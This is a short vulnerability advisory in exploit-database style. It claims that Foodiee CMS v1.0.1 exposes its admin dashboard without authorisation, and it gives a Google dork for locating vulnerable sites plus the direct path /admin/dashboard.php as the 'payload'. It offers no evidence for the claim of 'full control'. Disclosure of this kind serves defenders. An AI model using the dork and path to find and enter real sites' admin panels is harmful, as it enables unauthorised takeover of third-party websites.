==================================================================================================================================== | # Title : Foodiee CMS v1.0.1 Insecure Direct Object Reference Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) | | # Vendor : https://foodie.com.np/ | | # Dork : "restaurants_details.php?id=" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference Allows full control of the website. [+] Use payload : /admin/dashboard.php [+] http://127.0.0.1/wwwmaulikbazarcom/admin/dashboard.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | =======================================================================================================================================